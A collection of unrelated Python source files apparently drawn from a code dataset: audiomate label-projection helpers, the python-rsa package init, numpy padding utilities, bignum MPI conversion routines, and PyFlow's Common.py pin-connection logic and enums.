    apply to one or more segments simultaneously. By defining a special wildcard projection using `('**',)` it is not
required to specify a projection for every single combination of labels.
Args:
label_list (audiomate.annotations.LabelList): The label list to relabel
projections (dict): A dictionary that maps tuples of label combinations to string
labels.
Returns:
List: List of combinations of labels that are not covered by any projection
Example:
>>> ll = annotations.LabelList(labels=[
... annotations.Label('b', 3.2, 4.5),
... annotations.Label('a', 4.0, 4.9),
... annotations.Label('c', 4.2, 5.1)
... ])
>>> find_missing_projections(ll, {('b',): 'new_label'})
[('a', 'b'), ('a', 'b', 'c'), ('a', 'c'), ('c',)]
"""
unmapped_combinations = set()
if WILDCARD_COMBINATION in projections:
return []
for labeled_segment in label_list.ranges():
combination = tuple(sorted([label.value for label in labeled_segment[2]]))
if combination not in projections:
unmapped_combinations.add(combination)
return sorted(unmapped_combinations)
def load_projections(projections_file):
"""
Loads projections defined in the given `projections_file`.
The `projections_file` is expected to be in the following format::
old_label_1 | new_label_1
old_label_1 old_label_2 | new_label_2
old_label_3 |
You can define one projection per line. Each projection starts with a list of one or multiple
old labels (separated by a single whitespace) that are separated from the new label by a pipe
(`|`). In the code above, the segment labeled with `old_label_1` will be labeled with
`new_label_1` after applying the projection. Segments that are labeled with `old_label_1`
**and** `old_label_2` concurrently are relabeled to `new_label_2`. All segments labeled with
`old_label_3` are dropped. Combinations of multiple labels are automatically sorted in natural
order.
Args:
projections_file (str): Path to the file with projections
Returns:
dict: Dictionary where the keys are tuples of labels to project to the key's value
Example:
>>> load_projections('/path/to/projections.txt')
{('b',): 'foo', ('a', 'b'): 'a_b', ('a',): 'bar'}
"""
projections = {}
for parts in textfile.read_separated_lines_generator(projections_file, '|'):
combination = tuple(sorted([label.strip() for label in parts[0].split(' ')]))
new_label = parts[1].strip()
projections[combination] = new_label
return projections
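# Example sketch (an addition, not part of the original module): relabel() with
# an inline projections dict, equivalent to what load_projections() would return.
#
#   projections = {('music',): 'music', ('speech',): 'speech', ('**',): 'mixed'}
#   ll = annotations.LabelList(labels=[
#       annotations.Label('music', 0.0, 5.0),
#       annotations.Label('speech', 4.0, 8.0),
#   ])
#   relabel(ll, projections)  # the overlapping 4.0-5.0 segment becomes 'mixed'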
|
the-stack_0_1620 | # -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use random padding, compression of the
cleartext input to prevent repetitions, or other common security improvements.
Use with care.
"""
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = "2016-03-26"
__version__ = '3.4.1'
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError']
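# Usage sketch (an addition, not part of the upstream module); the key size and
# message below are arbitrary:
#
#   import rsa
#   (pub, priv) = rsa.newkeys(512)
#   crypto = rsa.encrypt(b'hello', pub)
#   assert rsa.decrypt(crypto, priv) == b'hello'
#   signature = rsa.sign(b'hello', priv, 'SHA-256')
#   rsa.verify(b'hello', signature, pub)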
|
the-stack_0_1622 | import numpy as np
def make_batches(size, batch_size):
nb_batch = int(np.ceil(size/float(batch_size)))
    return [(i*batch_size, min(size, (i+1)*batch_size)) for i in range(0, nb_batch)]  # (start, end) index pair for each batch
def pad_2d_vals_no_size(in_vals, dtype=np.int32):
size1 = len(in_vals)
size2 = np.max([len(x) for x in in_vals])
return pad_2d_vals(in_vals, size1, size2, dtype=dtype)
def pad_2d_vals(in_vals, dim1_size, dim2_size, dtype=np.int32):
out_val = np.zeros((dim1_size, dim2_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
cur_in_vals = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(cur_in_vals): cur_dim2_size = len(cur_in_vals)
out_val[i,:cur_dim2_size] = cur_in_vals[:cur_dim2_size]
return out_val
def pad_3d_vals_no_size(in_vals, dtype=np.int32):
size1 = len(in_vals)
size2 = np.max([len(x) for x in in_vals])
size3 = 0
for val in in_vals:
cur_size3 = np.max([len(x) for x in val])
if size3<cur_size3: size3 = cur_size3
return pad_3d_vals(in_vals, size1, size2, size3, dtype=dtype)
def pad_3d_vals(in_vals, dim1_size, dim2_size, dim3_size, dtype=np.int32):
# print(in_vals)
out_val = np.zeros((dim1_size, dim2_size, dim3_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
in_vals_i = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(in_vals_i): cur_dim2_size = len(in_vals_i)
for j in range(cur_dim2_size):
in_vals_ij = in_vals_i[j]
cur_dim3_size = dim3_size
if cur_dim3_size > len(in_vals_ij): cur_dim3_size = len(in_vals_ij)
out_val[i, j, :cur_dim3_size] = in_vals_ij[:cur_dim3_size]
return out_val
def pad_4d_vals(in_vals, dim1_size, dim2_size, dim3_size, dim4_size, dtype=np.int32):
out_val = np.zeros((dim1_size, dim2_size, dim3_size, dim4_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
in_vals_i = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(in_vals_i): cur_dim2_size = len(in_vals_i)
for j in range(cur_dim2_size):
in_vals_ij = in_vals_i[j]
cur_dim3_size = dim3_size
if cur_dim3_size > len(in_vals_ij): cur_dim3_size = len(in_vals_ij)
for k in range(cur_dim3_size):
in_vals_ijk = in_vals_ij[k]
cur_dim4_size = dim4_size
if cur_dim4_size > len(in_vals_ijk): cur_dim4_size = len(in_vals_ijk)
out_val[i, j, k, :cur_dim4_size] = in_vals_ijk[:cur_dim4_size]
return out_val
def pad_target_labels(in_val, max_length, dtype=np.float32):
batch_size = len(in_val)
out_val = np.zeros((batch_size, max_length), dtype=dtype)
for i in range(batch_size):
for index in in_val[i]:
out_val[i,index] = 1.0
return out_val
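if __name__ == '__main__':
    # Small self-check / usage sketch, added for illustration; not part of the
    # original module.
    assert make_batches(10, 4) == [(0, 4), (4, 8), (8, 10)]
    ragged = [[1, 2, 3], [4, 5]]
    padded = pad_2d_vals_no_size(ragged)
    assert padded.shape == (2, 3)
    assert padded[1, 2] == 0  # short rows are zero-padded on the right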
|
the-stack_0_1623 | #
#
# bignum.py
#
# This file is copied from python-filbitlib.
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
"""Bignum routines"""
from __future__ import absolute_import, division, print_function, unicode_literals
import struct
# generic big endian MPI format
def bn_bytes(v, have_ext=False):
ext = 0
if have_ext:
ext = 1
return ((v.bit_length()+7)//8) + ext
def bn2bin(v):
s = bytearray()
i = bn_bytes(v)
while i > 0:
s.append((v >> ((i-1) * 8)) & 0xff)
i -= 1
return s
def bin2bn(s):
l = 0
for ch in s:
l = (l << 8) | ch
return l
def bn2mpi(v):
have_ext = False
if v.bit_length() > 0:
have_ext = (v.bit_length() & 0x07) == 0
neg = False
if v < 0:
neg = True
v = -v
s = struct.pack(b">I", bn_bytes(v, have_ext))
ext = bytearray()
if have_ext:
ext.append(0)
v_bin = bn2bin(v)
if neg:
if have_ext:
ext[0] |= 0x80
else:
v_bin[0] |= 0x80
return s + ext + v_bin
def mpi2bn(s):
if len(s) < 4:
return None
s_size = bytes(s[:4])
v_len = struct.unpack(b">I", s_size)[0]
if len(s) != (v_len + 4):
return None
if v_len == 0:
return 0
v_str = bytearray(s[4:])
neg = False
i = v_str[0]
if i & 0x80:
neg = True
i &= ~0x80
v_str[0] = i
v = bin2bn(v_str)
if neg:
return -v
return v
# filbit-specific little endian format, with implicit size
def mpi2vch(s):
r = s[4:] # strip size
r = r[::-1] # reverse string, converting BE->LE
return r
def bn2vch(v):
return bytes(mpi2vch(bn2mpi(v)))
def vch2mpi(s):
r = struct.pack(b">I", len(s)) # size
r += s[::-1] # reverse string, converting LE->BE
return r
def vch2bn(s):
return mpi2bn(vch2mpi(s))
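if __name__ == '__main__':
    # Round-trip self-check, added for illustration; not part of the original
    # file. Both the MPI and the little-endian vch encodings should invert cleanly.
    for v in (0, 1, 127, 128, 255, 256, 0xdeadbeef, -1, -255):
        assert mpi2bn(bn2mpi(v)) == v
        assert vch2bn(bn2vch(v)) == v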
|
the-stack_0_1624 | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""
.. sidebar:: **Common.py**
**Common.py** is a common definitions file. This file is imported in almost all others files of the program
"""
import re
import math
import time
import inspect
import struct
import weakref
try:
from queue import Queue
except:
from Queue import Queue
import uuid
import sys
from nine import IS_PYTHON2, str
if IS_PYTHON2:
from aenum import IntEnum, Flag, auto, Enum
else:
from enum import IntEnum, Flag, auto, Enum
from PyFlow import findPinClassByType
from PyFlow.Core.version import Version
maxint = 2 ** (struct.Struct('i').size * 8 - 1) - 1
FLOAT_RANGE_MIN = 0.1 + (-maxint - 1.0)
FLOAT_RANGE_MAX = maxint + 0.1
INT_RANGE_MIN = -maxint + 0
INT_RANGE_MAX = maxint + 0
DEFAULT_IN_EXEC_NAME = str('inExec')
DEFAULT_OUT_EXEC_NAME = str('outExec')
DEFAULT_WIDGET_VARIANT = str('DefaultWidget')
REF = str('Reference')
def lerp(start, end, alpha):
"""Performs a linear interpolation
>>> start + alpha * (end - start)
:param start: start the value to interpolate from
:param end: end the value to interpolate to
:param alpha: alpha how far to interpolate
:returns: The result of the linear interpolation
"""
return (start + alpha * (end - start))
def GetRangePct(MinValue, MaxValue, Value):
"""Calculates the percentage along a line from **MinValue** to **MaxValue** that value is.
:param MinValue: Minimum Value
:param MaxValue: Maximum Value
:param Value: Input value
:returns: The percentage (from 0.0 to 1.0) between the two values where input value is
"""
return (Value - MinValue) / (MaxValue - MinValue)
def mapRangeClamped(Value, InRangeA, InRangeB, OutRangeA, OutRangeB):
"""Returns Value mapped from one range into another where the Value is clamped to the Input Range.
(e.g. 0.5 normalized from the range 0->1 to 0->50 would result in 25)
"""
ClampedPct = clamp(GetRangePct(InRangeA, InRangeB, Value), 0.0, 1.0)
return lerp(OutRangeA, OutRangeB, ClampedPct)
def mapRangeUnclamped(Value, InRangeA, InRangeB, OutRangeA, OutRangeB):
"""Returns Value mapped from one range into another where the Value is clamped to the Input Range.
(e.g. 0.5 normalized from the range 0->1 to 0->50 would result in 25)"""
return lerp(OutRangeA, OutRangeB, GetRangePct(InRangeA, InRangeB, Value))
def sign(x):
"""Returns sign of x. -1 if x is negative, 1 if positive and zero if 0.
>>> x and (1, -1)[x < 0]
"""
return x and (1, -1)[x < 0]
def currentProcessorTime():
if IS_PYTHON2:
return time.clock()
else:
return time.process_time()
def clamp(n, vmin, vmax):
"""Computes the value of the first specified argument clamped to a range defined by the second and third specified arguments
:param n: input Value
    :param vmin: Minimum Value
:param vmax: Maximum Value
:returns: The clamped value of n
"""
return max(min(n, vmax), vmin)
def roundup(x, to):
"""Rounding up to sertain value
>>> roundup(7, 8)
>>> 8
>>> roundup(8, 8)
>>> 8
>>> roundup(9, 8)
>>> 16
:param x: value to round
:param to: value x will be rounded to
:returns: rounded value of x
:rtype: int
"""
return int(math.ceil(x / to)) * to
_currentVersion = Version(sys.version_info.major, sys.version_info.minor, 0)
python32 = Version(3, 2, 0)
if _currentVersion <= python32:
def clearList(list):
"""Clears python list
:param list: list to clear
:type list: list
:returns: cleared List
:rtype: list
"""
del list[:]
else:
def clearList(list):
"""Clears python list
:param list: list to clear
:type list: list
:returns: cleared List
:rtype: list
"""
list.clear()
def findGoodId(ids):
"""
Finds good minimum unique int from iterable. Starting from 1
:param ids: a collection of occupied ids
:type ids: list|set|tuple
:returns: Unique Id
:rtype: int
"""
if len(ids) == 0:
return 1
ids = sorted(set(ids))
lastID = min(ids)
if lastID > 1:
return 1
for ID in ids:
diff = ID - lastID
if diff > 1:
return lastID + 1
break
lastID = ID
else:
return ID + 1
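# For example (added note): findGoodId([1, 2, 4]) returns 3, findGoodId([2, 3])
# returns 1 and findGoodId([]) returns 1.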
def wrapStringToFunctionDef(functionName, scriptString, kwargs=None):
"""Generates function string which then can be compiled and executed
Example:
::
wrapStringToFunctionDef('test', 'print(a)', {'a': 5})
Will produce following function:
::
def test(a=5):
print(a)
"""
kwargsString = ""
if kwargs is not None:
for argname, argValue in kwargs.items():
if isinstance(argValue, str):
argValue = "'{}'".format(argValue)
kwargsString += "{0}={1}, ".format(argname, argValue)
kwargsString = kwargsString[:-2]
result = "def {0}({1}):\n".format(functionName, kwargsString)
for scriptLine in scriptString.split('\n'):
result += "\t{}".format(scriptLine)
result += '\n'
return result
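# Usage sketch (added note): the generated source can be turned into a callable
# with exec(), e.g.
#   namespace = {}
#   exec(wrapStringToFunctionDef('test', 'print(a)', {'a': 5}), namespace)
#   namespace['test']()  # prints 5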
def cycleCheck(src, dst):
"""Check for cycle connected nodes
:param src: hand side pin
:type src: :class:`PyFlow.Core.PinBase`
:param dst: hand side pin
:type dst: :class:`PyFlow.Core.PinBase`
    :returns: True if a cycle is detected
:rtype: bool
"""
if src.direction == PinDirection.Input:
src, dst = dst, src
start = src
if src in dst.affects:
return True
for i in dst.affects:
if cycleCheck(start, i):
return True
return False
def arePinsConnected(src, dst):
"""Checks if two pins are connected
.. note:: Pins can be passed in any order if **src** pin is :py:class:`PyFlow.Core.Common.PinDirection`, they will be swapped
:param src: left hand side pin
:type src: :py:class:`PyFlow.Core.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`PyFlow.Core.PinBase`
:returns: True if Pins are connected
:rtype: bool
"""
if src.direction == dst.direction:
return False
if src.owningNode() == dst.owningNode():
return False
if src.direction == PinDirection.Input:
src, dst = dst, src
if dst in src.affects and src in dst.affected_by:
return True
return False
def getConnectedPins(pin):
"""Find all connected Pins to input Pin
:param pin: Pin to search connected pins
:type pin: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: Set of connected pins
:rtype: set(:py:class:`PyFlow.Core.PinBase.PinBase`)
"""
result = set()
if pin.direction == PinDirection.Input:
for lhsPin in pin.affected_by:
result.add(lhsPin)
if pin.direction == PinDirection.Output:
for rhsPin in pin.affects:
result.add(rhsPin)
return result
def pinAffects(lhs, rhs):
"""This function for establish dependencies bitween pins
.. warning:: Used internally, users will hardly need this
:param lhs: First pin to connect
:type lhs: :py:class:`PyFlow.Core.PinBase.PinBase`
:param rhs: Second Pin to connect
:type rhs: :py:class:`PyFlow.Core.PinBase.PinBase`
"""
assert(lhs is not rhs), "pin can not affect itself"
lhs.affects.add(rhs)
rhs.affected_by.add(lhs)
def canConnectPins(src, dst):
"""**Very important fundamental function, it checks if connection between two pins is possible**
:param src: Source pin to connect
:type src: :py:class:`PyFlow.Core.PinBase.PinBase`
:param dst: Destination pin to connect
:type dst: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: True if connection can be made, and False if connection is not possible
:rtype: bool
"""
if src is None or dst is None:
return False
if src.direction == dst.direction:
return False
if arePinsConnected(src, dst):
return False
if src.direction == PinDirection.Input:
src, dst = dst, src
if cycleCheck(src, dst):
return False
if src.isExec() and dst.isExec():
return True
if not src.isArray() and dst.isArray():
if dst.optionEnabled(PinOptions.SupportsOnlyArrays):
if not src.canChangeStructure(dst._currStructure, []):
return False
if not dst.canChangeStructure(src._currStructure, [], selfCheck=False):
if not src.canChangeStructure(dst._currStructure, [], selfCheck=False):
return False
if not src.isDict() and dst.isDict():
if dst.optionEnabled(PinOptions.SupportsOnlyArrays):
if not (src.canChangeStructure(dst._currStructure, []) or dst.canChangeStructure(src._currStructure, [], selfCheck=False)):
return False
elif not src.supportDictElement([], src.optionEnabled(PinOptions.DictElementSupported)) and dst.optionEnabled(PinOptions.SupportsOnlyArrays) and not dst.canChangeStructure(src._currStructure, [], selfCheck=False):
return False
else:
DictElement = src.getDictElementNode([])
dictNode = dst.getDictNode([])
nodeFree = False
if dictNode:
nodeFree = dictNode.KeyType.checkFree([])
if DictElement:
if not DictElement.key.checkFree([]) and not nodeFree:
if dst._data.keyType != DictElement.key.dataType:
return False
if src.isArray() and not dst.isArray():
srcCanChangeStruct = src.canChangeStructure(dst._currStructure, [])
dstCanChangeStruct = dst.canChangeStructure(src._currStructure, [], selfCheck=False)
if not dst.optionEnabled(PinOptions.ArraySupported) and not (srcCanChangeStruct or dstCanChangeStruct):
return False
if src.isDict() and not dst.isDict():
srcCanChangeStruct = src.canChangeStructure(dst._currStructure, [])
dstCanChangeStruct = dst.canChangeStructure(src._currStructure, [], selfCheck=False)
if not dst.optionEnabled(PinOptions.DictSupported) and not (srcCanChangeStruct or dstCanChangeStruct):
return False
if dst.hasConnections():
if not dst.optionEnabled(PinOptions.AllowMultipleConnections) and dst.reconnectionPolicy == PinReconnectionPolicy.ForbidConnection:
return False
if src.hasConnections():
if not src.optionEnabled(PinOptions.AllowMultipleConnections) and src.reconnectionPolicy == PinReconnectionPolicy.ForbidConnection:
return False
if src.owningNode().graph() is None or dst.owningNode().graph() is None:
return False
if src.owningNode().graph() is not dst.owningNode().graph():
return False
if src.isAny() and dst.isExec():
if src.dataType not in dst.supportedDataTypes():
return False
if src.isExec() and not dst.isExec():
return False
if not src.isExec() and dst.isExec():
return False
if src.IsValuePin() and dst.IsValuePin():
if src.dataType in dst.allowedDataTypes([], dst._supportedDataTypes) or dst.dataType in src.allowedDataTypes([], src._supportedDataTypes):
a = src.dataType == "AnyPin" and not src.canChangeTypeOnConnection([], src.optionEnabled(PinOptions.ChangeTypeOnConnection), [])
b = dst.canChangeTypeOnConnection([], dst.optionEnabled(PinOptions.ChangeTypeOnConnection), []) and not dst.optionEnabled(PinOptions.AllowAny)
c = not dst.canChangeTypeOnConnection([], dst.optionEnabled(PinOptions.ChangeTypeOnConnection), []) and not dst.optionEnabled(PinOptions.AllowAny)
if all([a, b or c]):
return False
if not src.isDict() and dst.supportOnlyDictElement([], dst.isDict()) and not (dst.checkFree([], selfCheck=False) and dst.canChangeStructure(src._currStructure, [], selfCheck=False)):
if not src.supportDictElement([], src.optionEnabled(PinOptions.DictElementSupported)) and dst.supportOnlyDictElement([], dst.isDict()):
return False
return True
else:
if src.dataType not in dst.supportedDataTypes():
return False
if all([src.dataType in list(dst.allowedDataTypes([], dst._defaultSupportedDataTypes, selfCheck=dst.optionEnabled(PinOptions.AllowMultipleConnections), defaults=True)) + ["AnyPin"],
dst.checkFree([], selfCheck=dst.optionEnabled(PinOptions.AllowMultipleConnections))]):
return True
if all([dst.dataType in list(src.allowedDataTypes([], src._defaultSupportedDataTypes, defaults=True)) + ["AnyPin"],
src.checkFree([])]):
return True
return False
if src.owningNode == dst.owningNode:
return False
return True
def connectPins(src, dst):
"""**Connects two pins**
    These are the rules for how pins connect:
* Input value pins can have one output connection if :py:class:`PyFlow.Core.Common.PinOptions.AllowMultipleConnections` flag is disabled
* Output value pins can have any number of connections
* Input execs can have any number of connections
* Output execs can have only one connection
:param src: left hand side pin
:type src: :py:class:`PyFlow.Core.PinBase.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: True if connected Successfully
:rtype: bool
"""
if src.direction == PinDirection.Input:
src, dst = dst, src
if not canConnectPins(src, dst):
return False
# input value pins can have one output connection if `AllowMultipleConnections` flag is disabled
# output value pins can have any number of connections
if src.IsValuePin() and dst.IsValuePin():
if dst.hasConnections():
if not dst.optionEnabled(PinOptions.AllowMultipleConnections):
dst.disconnectAll()
# input execs can have any number of connections
# output execs can have only one connection
if src.isExec() and dst.isExec():
if src.hasConnections():
if not src.optionEnabled(PinOptions.AllowMultipleConnections):
src.disconnectAll()
if src.isExec() and dst.isExec():
src.onExecute.connect(dst.call)
dst.aboutToConnect(src)
src.aboutToConnect(dst)
pinAffects(src, dst)
src.setDirty()
dst.setData(src.currentData())
dst.pinConnected(src)
src.pinConnected(dst)
push(dst)
return True
def connectPinsByIndexes(lhsNode=None, lhsOutPinIndex=0, rhsNode=None, rhsInPinIndex=0):
"""Connects pins regardless name.
This function uses pin locations on node. Top most pin have position index 1, pin below - 2 etc.
:param lhsNode: Left hand side node
:type lhsNode: :class:`~PyFlow.Core.NodeBase.NodeBase`
:param lhsOutPinIndex: Out pin position on left hand side node
:type lhsOutPinIndex: int
:param rhsNode: Right hand side node
:type rhsNode: :class:`~PyFlow.Core.NodeBase.NodeBase`
    :param rhsInPinIndex: In pin position on right hand side node
:type rhsInPinIndex: int
"""
if lhsNode is None:
return False
if rhsNode is None:
return False
if lhsOutPinIndex not in lhsNode.orderedOutputs:
return False
if rhsInPinIndex not in rhsNode.orderedInputs:
return False
lhsPin = lhsNode.orderedOutputs[lhsOutPinIndex]
rhsPin = rhsNode.orderedInputs[rhsInPinIndex]
return connectPins(lhsPin, rhsPin)
def traverseConstrainedPins(startFrom, callback):
"""Iterate over constrained and connected pins
Iterates over all constrained chained pins of type :class:`Any <PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin>` and passes pin into callback function. Callback will be executed once for every pin
:param startFrom: First pin to start Iteration
:type startFrom: :class:`~PyFlow.Core.PinBase.PinBase`
:param callback: Functor to execute in each iterated pin.
:type callback: callback(:class:`~PyFlow.Core.PinBase.PinBase`)
"""
if not startFrom.isAny():
return
traversed = set()
def worker(pin):
traversed.add(pin)
callback(pin)
if pin.constraint is None:
nodePins = set()
else:
nodePins = set(pin.owningNode().constraints[pin.constraint])
for connectedPin in getConnectedPins(pin):
if connectedPin.isAny():
nodePins.add(connectedPin)
for neighbor in nodePins:
if neighbor not in traversed:
worker(neighbor)
worker(startFrom)
def disconnectPins(src, dst):
"""Disconnects two pins
:param src: left hand side pin
:type src: :py:class:`~PyFlow.Core.PinBase.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`~PyFlow.Core.PinBase.PinBase`
:returns: True if disconnection success
:rtype: bool
"""
if arePinsConnected(src, dst):
if src.direction == PinDirection.Input:
src, dst = dst, src
src.affects.remove(dst)
dst.affected_by.remove(src)
src.pinDisconnected(dst)
dst.pinDisconnected(src)
push(dst)
if src.isExec() and dst.isExec():
src.onExecute.disconnect(dst.call)
return True
return False
def push(start_from):
"""Marks dirty all ports from start to the right
this part of graph will be recomputed every tick
:param start_from: pin from which recursion begins
:type start_from: :py:class:`~PyFlow.Core.PinBase.PinBase`
"""
if not len(start_from.affects) == 0:
start_from.setDirty()
for i in start_from.affects:
i.setDirty()
push(i)
def extractDigitsFromEndOfString(string):
"""Get digits at end of a string
Example:
>>> nums = extractDigitsFromEndOfString("h3ello154")
>>> print(nums, type(nums))
>>> 154 <class 'int'>
:param string: Input numbered string
:type string: str
:returns: Numbers in the final of the string
:rtype: int
"""
    result = re.search(r'(\d+)$', string)
if result is not None:
return int(result.group(0))
def removeDigitsFromEndOfString(string):
"""Delete the numbers at the end of a string
Similar to :func:`~PyFlow.Core.Common.extractDigitsFromEndOfString`, but removes digits in the end.
:param string: Input string
:type string: string
:returns: Modified string
:rtype: string
"""
return re.sub(r'\d+$', '', string)
def getUniqNameFromList(existingNames, name):
"""Create unique name
Iterates over **existingNames** and extracts the end digits to find a new unique id
:param existingNames: List of strings where to search for existing indexes
:type existingNames: list
:param name: Name to obtain a unique version from
:type name: str
    :returns: New name not overlapping with any in existingNames
:rtype: str
"""
if name not in existingNames:
return name
ids = set()
for existingName in existingNames:
digits = extractDigitsFromEndOfString(existingName)
if digits is not None:
ids.add(digits)
idx = findGoodId(ids)
nameNoDigits = removeDigitsFromEndOfString(name)
return nameNoDigits + str(idx)
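# For example (added note): getUniqNameFromList(['node', 'node1'], 'node')
# returns 'node2', while getUniqNameFromList(['node1'], 'node') returns 'node'
# because that name is still free.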
def clearSignal(signal):
"""Disconnects all receivers
:param signal: emitter
:type signal: :class:`~blinker.base.Signal`
"""
for receiver in list(signal.receivers.values()):
if isinstance(receiver, weakref.ref):
signal.disconnect(receiver())
else:
signal.disconnect(receiver)
class SingletonDecorator:
"""Decorator to make class unique, so each time called same object returned
"""
allInstances = []
@staticmethod
def destroyAll():
for instance in SingletonDecorator.allInstances:
instance.destroy()
def __init__(self, cls):
self.cls = cls
self.instance = None
self.allInstances.append(self)
def destroy(self):
del self.instance
self.instance = None
def __call__(self, *args, **kwds):
if self.instance is None:
self.instance = self.cls(*args, **kwds)
return self.instance
class DictElement(tuple):
"""PyFlow dict element class
This subclass of python's :class:`tuple` is to represent dict elements to construct typed dicts
"""
def __new__(self, a=None, b=None):
if a is None and b is None:
new = ()
elif b is None:
if isinstance(a, tuple) and len(a) <= 2:
new = a
else:
raise Exception("non Valid Input")
else:
new = (a, b)
return super(DictElement, self).__new__(self, new)
class PFDict(dict):
"""This subclass of python's :class:`dict` implements a key typed dictionary.
Only defined data types can be used as keys, and only hashable ones as determined by
>>> isinstance(dataType, collections.Hashable)
To make a class Hashable some methods should be implemented:
Example:
::
class C:
def __init__(self, x):
self.x = x
def __repr__(self):
return "C({})".format(self.x)
def __hash__(self):
return hash(self.x)
def __eq__(self, other):
return (self.__class__ == other.__class__ and self.x == other.x)
"""
def __init__(self, keyType, valueType=None, inp={}):
"""
:param keyType: Key dataType
:param valueType: value dataType, defaults to None
:type valueType: optional
:param inp: Construct from another dict, defaults to {}
:type inp: dict, optional
"""
super(PFDict, self).__init__(inp)
self.keyType = keyType
self.valueType = valueType
def __setitem__(self, key, item):
"""Re implements Python Dict __setitem__ to only allow Typed Keys.
Will throw an Exception if non Valid KeyType
"""
if type(key) == self.getClassFromType(self.keyType):
super(PFDict, self).__setitem__(key, item)
else:
raise Exception(
"Valid key should be a {0}".format(self.getClassFromType(self.keyType)))
def getClassFromType(self, pinType):
"""
Gets the internal data structure for a defined pin type
:param pinType: pinType Name
:type pinType: class or None
"""
pin = findPinClassByType(pinType)
if pin:
pinClass = pin.internalDataStructure()
return pinClass
return None
class PinReconnectionPolicy(IntEnum):
"""How to behave if pin has connections and another connection about to be performed.
"""
DisconnectIfHasConnections = 0 #: Current connection will be broken
ForbidConnection = 1 #: New connection will be cancelled
class PinOptions(Flag):
"""Used to determine how Pin behaves.
Apply flags on pin instances.
.. seealso:: :meth:`~PyFlow.Core.PinBase.PinBase.enableOptions` :meth:`~PyFlow.Core.PinBase.PinBase.disableOptions`
"""
ArraySupported = auto() #: Pin can hold array data structure
DictSupported = auto() #: Pin can hold dict data structure
SupportsOnlyArrays = auto() #: Pin will only support other pins with array data structure
AllowMultipleConnections = auto() #: This enables pin to allow more that one input connection. See :func:`~PyFlow.Core.Common.connectPins`
ChangeTypeOnConnection = auto() #: Used by :class:`~PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin` to determine if it can change its data type on new connection.
RenamingEnabled = auto() #: Determines if pin can be renamed
Dynamic = auto() #: Specifies if pin was created dynamically (during program runtime)
AlwaysPushDirty = auto() #: Pin will always be seen as dirty (computation needed)
Storable = auto() #: Determines if pin data can be stored when pin serialized
    AllowAny = auto() #: Special flag that allows a pin to be :class:`~PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin`, which means non typed, without being marked as an error. By default a :py:class:`PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin` needs to be initialized with some data type from another defined pin. This flag overrides that. Used in lists and non typed nodes
DictElementSupported = auto() #: Dicts are constructed with :class:`DictElement` objects. So dict pins will only allow other dicts until this flag enabled. Used in :class:`~PyFlow.Packages.PyFlowBase.Nodes.makeDict` node
class StructureType(IntEnum):
"""Used to determine structure type for values.
"""
Single = 0 #: Single data structure
Array = 1 #: Python list structure, represented as arrays -> typed and lists -> non typed
    Dict = 2 #: :py:class:`PFDict` structure, is basically a key typed python dict
Multi = 3 #: This means it can became any of the previous ones on connection/user action
def findStructFromValue(value):
"""Finds :class:`~PyFlow.Core.Common.StructureType` from value
:param value: input value to find structure.
:returns: Structure Type for input value
:rtype: :class:`~PyFlow.Core.Common.StructureType`
"""
if isinstance(value, list):
return StructureType.Array
if isinstance(value, dict):
return StructureType.Dict
return StructureType.Single
class PinSelectionGroup(IntEnum):
"""Used in :meth:`~PyFlow.Core.NodeBase.NodeBase.getPinSG` for optimization purposes
"""
Inputs = 0 #: Input pins
Outputs = 1 #: Outputs pins
BothSides = 2 #: Both sides pins
class AccessLevel(IntEnum):
"""Can be used for code generation
"""
public = 0 #: public
private = 1 #: private
protected = 2 #: protected
class PinDirection(IntEnum):
"""Determines whether it is input pin or output
"""
Input = 0 #: Left side pins
Output = 1 #: Right side pins
class NodeTypes(IntEnum):
"""Determines whether it is callable node or pure
"""
Callable = 0 #: Callable node is a node with exec pins
Pure = 1 #: Normal nodes
class Direction(IntEnum):
""" Direction identifiers
"""
Left = 0 #: Left
Right = 1 #: Right
Up = 2 #: Up
Down = 3 #: Down
class PinSpecifires:
"""Pin specifires constants
:var SUPPORTED_DATA_TYPES: To specify supported data types list
:var CONSTRAINT: To specify type constraint key
